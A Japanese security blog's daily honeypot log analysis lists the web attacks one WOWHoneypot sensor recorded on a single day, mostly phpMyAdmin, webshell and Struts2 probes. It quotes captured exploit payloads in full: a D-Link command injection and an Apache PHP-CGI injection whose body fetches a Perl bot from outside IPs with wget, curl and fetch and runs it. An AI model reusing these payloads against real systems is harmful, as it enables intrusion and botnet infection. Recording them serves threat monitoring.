S-Owl

S(ecurity)Owl

トップ > honeypot > WOWHoneypotの簡易分析(47日目)

WOWHoneypotの簡易分析(47日目)

honeypot

WOWhoneypotの2018/07/20(金) (運用47日目)の簡易分析です。
本日の総アクセス件数は 230件です。以下が全アクセスログです。

40 2018-07-20 GET /
10 2018-07-20 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://104.244.72[.]82/k%20-O%20-%3E%20/tmp/k;sh%20/tmp/k%27$
4 2018-07-20 GET /pmamy/index.php
4 2018-07-20 GET /PMA/index.php
4 2018-07-20 GET /pma/index.php
4 2018-07-20 GET /phpMyAdmin/index.php
4 2018-07-20 GET /index.php
3 2018-07-20 POST /qq.php
3 2018-07-20 GET /?XDEBUG_SESSION_START=phpstorm
3 2018-07-20 GET /pmd/index.php
3 2018-07-20 GET /phpmyadmin/index.php
3 2018-07-20 GET /mysql/index.php
2 2018-07-20 POST /xx.php
2 2018-07-20 POST /xw.php
2 2018-07-20 POST /xshell.php
2 2018-07-20 POST /xiaoma.php
2 2018-07-20 POST /wuwu11.php
2 2018-07-20 POST /wshell.php
2 2018-07-20 POST /w.php
2 2018-07-20 POST /weixiao.php
2 2018-07-20 POST /wc.php
2 2018-07-20 POST /s.php
2 2018-07-20 POST /sheep.php
2 2018-07-20 POST /phpstudy.php
2 2018-07-20 POST /mx.php
2 2018-07-20 POST /lindex.php
2 2018-07-20 POST /feixiang.php
2 2018-07-20 POST /db_session.init.php
2 2018-07-20 POST /db.init.php
2 2018-07-20 POST /db__.init.php
2 2018-07-20 POST /conflg.php
2 2018-07-20 POST /ak47.php
2 2018-07-20 POST /9678.php
2 2018-07-20 HEAD /
2 2018-07-20 GET /xampp/phpmyadmin/index.php
2 2018-07-20 GET /www/phpMyAdmin/index.php
2 2018-07-20 GET /webdav/
2 2018-07-20 GET /typo3/phpmyadmin/index.php
2 2018-07-20 GET /tools/phpMyAdmin/index.php
2 2018-07-20 GET /pma/scripts/setup.php
2 2018-07-20 GET /pma-old/index.php
2 2018-07-20 GET /pmamy2/index.php
2 2018-07-20 GET /PMA2/index.php
2 2018-07-20 GET /phpMyAdmin/scripts/setup.php
2 2018-07-20 GET /phpMyAdmin/phpMyAdmin/index.php
2 2018-07-20 GET /phpmyadmin/phpmyadmin/index.php
2 2018-07-20 GET /phpMyAdminold/index.php
2 2018-07-20 GET /phpmyadmin-old/index.php
2 2018-07-20 GET /phpMyadmin_bak/index.php
2 2018-07-20 GET /phpmyadmin2/index.php
2 2018-07-20 GET /phpmyadmin0/index.php
2 2018-07-20 GET /phpadmin/index.php
2 2018-07-20 GET /mysqladmin/index.php
2 2018-07-20 GET /mysql-admin/index.php
2 2018-07-20 GET /myadmin/index.php
2 2018-07-20 GET /myadmin2/index.php
2 2018-07-20 GET /db/index.php
2 2018-07-20 GET /dbadmin/index.php
2 2018-07-20 GET /claroline/phpMyAdmin/index.php
2 2018-07-20 GET /admin/PMA/index.php
2 2018-07-20 GET /admin/pma/index.php
2 2018-07-20 GET /admin/phpMyAdmin/index.php
2 2018-07-20 GET /admin/phpmyadmin/index.php
2 2018-07-20 GET /admin/mysql/index.php
2 2018-07-20 GET /admin/mysql2/index.php
2 2018-07-20 GET /admin/index.php
1 2018-07-20 PROPFIND /
1 2018-07-20 POST /yao.php
1 2018-07-20 POST /xw1.php
1 2018-07-20 POST /xiao.php
1 2018-07-20 POST /webslee.php
1 2018-07-20 POST /q.php
1 2018-07-20 POST /pe.php
1 2018-07-20 POST /log.php
1 2018-07-20 POST /hm.php
1 2018-07-20 POST /GponForm/diag_Form?images/
1 2018-07-20 POST /fack.php
1 2018-07-20 POST /defect.php
1 2018-07-20 POST /data.php
1 2018-07-20 POST /angge.php
1 2018-07-20 POST /8899.php
1 2018-07-20 POST /7788.php
1 2018-07-20 POST //%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E
1 2018-07-20 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
1 2018-07-20 GET /register.jsp
1 2018-07-20 GET /phpmyadmin/scripts/setup.php
1 2018-07-20 GET /phpma/index.php
1 2018-07-20 GET /MyAdmin/scripts/setup.php
1 2018-07-20 GET /myadmin/scripts/setup.php
1 2018-07-20 GET /manager/html
1 2018-07-20 GET /main.jsp
1 2018-07-20 GET /login/login.jsp
1 2018-07-20 GET /login.jsp
1 2018-07-20 GET /login/indexAction.action
1 2018-07-20 GET /login.do
1 2018-07-20 GET /login.action
1 2018-07-20 GET /index.jsp
1 2018-07-20 GET /index.do
1 2018-07-20 GET /indexAction.action
1 2018-07-20 GET /index.action
1 2018-07-20 GET /default.jsp
1 2018-07-20 GET /admin/phpmyadmin2/index.php
1 2018-07-20 GET /admin/assets/js/views/login.js 

phpMyAdminの利用有無の調査行為は97件です。
phpに対するPOSTは59件です。
その他/を除外したアクセス数です。分析できる攻撃の種類が多くてワクワクしますね。

10 2018-07-20 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://104.244.72.82/k%20-O%20-%3E%20/tmp/k;sh%20/tmp/k%27$
3 2018-07-20 GET /?XDEBUG_SESSION_START=phpstorm
2 2018-07-20 GET /webdav/
1 2018-07-20 POST /GponForm/diag_Form?images/
1 2018-07-20 POST //%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E
1 2018-07-20 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
1 2018-07-20 GET /manager/html
1 2018-07-20 GET /register.jsp
1 2018-07-20 GET /main.jsp
1 2018-07-20 GET /login/login.jsp
1 2018-07-20 GET /login.jsp
1 2018-07-20 GET /login/indexAction.action
1 2018-07-20 GET /login.do
1 2018-07-20 GET /login.action
1 2018-07-20 GET /index.jsp
1 2018-07-20 GET /index.do
1 2018-07-20 GET /indexAction.action
1 2018-07-20 GET /index.action
1 2018-07-20 GET /default.jsp
1 2018-07-20 GET /admin/assets/js/views/login.js 

 

D-LINKの脆弱性を狙うMirai亜種Shinoa/Satoriの攻撃検知が再び増加しているのが気になります。

10 2018-07-20 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://104.244.72.82/k%20-O%20-%3E%20/tmp/k;sh%20/tmp/k%27$  

XDebugというPHPをリモートでデバッグするツールへの調査行為と思われます。 

3 2018-07-20 GET /?XDEBUG_SESSION_START=phpstorm

WebDAVの使用有無の調査行為です。

2 2018-07-20 GET /webdav/

家庭用GPONルータの任意のコード実行の脆弱性を狙うMirai亜種Masutaの攻撃です。
これもSinoaと同じくUser-AgentがHello,Worldでした。

1 2018-07-20 POST /GponForm/diag_Form?images/
User-Agent: Hello, World

Apache脆弱性を突くApache Magica攻撃です。

1 2018-07-20 POST //%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E
→ POST //cgi-binphp-dallow_url_include=on-dsafe_mode=off-dsuhosin.simulation=on-ddisable_functions=""-dopen_basedir=none-dauto_prepend_file=php://input-dcgi.force_redirect=0-dcgi.redirect_status_env=0-dauto_prepend_file=php://input-n
Body部→ <? system("cd /tmp ; wget -c -q http://95.110.227[.]132/ch/wp-admin/js/a/msr;perl msr;rm -rf msr ; curl -O http://95.110.227[.]132/ch/wp-admin/js/a/msr;perl msr;rm -rf msr; fetch http://95.110.227[.]132/ch/wp-admin/js/a/msr;perl msr;rm -rf msr "); ?>s 

 スキャンツールZmEuによるスキャンです。

1 2018-07-20 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
User-Agent: ZmEu

Tomcatの管理コンソールへの調査行為

1 2018-07-20 GET /manager/html

Apache Struts2脆弱性脆弱性をついた攻撃

1 2018-07-20 GET /register.jsp
1 2018-07-20 GET /main.jsp
1 2018-07-20 GET /login/login.jsp
1 2018-07-20 GET /login.jsp
1 2018-07-20 GET /login/indexAction.action
1 2018-07-20 GET /login.do
1 2018-07-20 GET /login.action
1 2018-07-20 GET /index.jsp
1 2018-07-20 GET /index.do
1 2018-07-20 GET /indexAction.action
1 2018-07-20 GET /index.action
1 2018-07-20 GET /default.jsp 

 FreePBXの存在を狙ったスキャンと思われます。

1 2018-07-20 GET /admin/assets/js/views/login.js 

 

 

本日のハンティングログは以下です。

10 2018-07-20 wget hxxp://104.244.72.82/k
1 2018-07-20 wget -c -q hxxp://95.110.227.132/ch/wp-admin/js/a/msr;perl msr;rm -rf msr ; curl -O hxxp://95.110.227.132/ch/wp-admin/js/a/msr;perl msr;rm -rf msr; fetch hxxp://95.110.227.132/ch/wp-admin/js/a/msr
1 2018-07-20 fetch hxxp://95.110.227.132/ch/wp-admin/js/a/msr
1 2018-07-20 curl -O hxxp://95.110.227.132/ch/wp-admin/js/a/msr;perl msr;rm -rf msr; fetch hxxp://95.110.227.132/ch/wp-admin/js/a/msr 

 

以上です。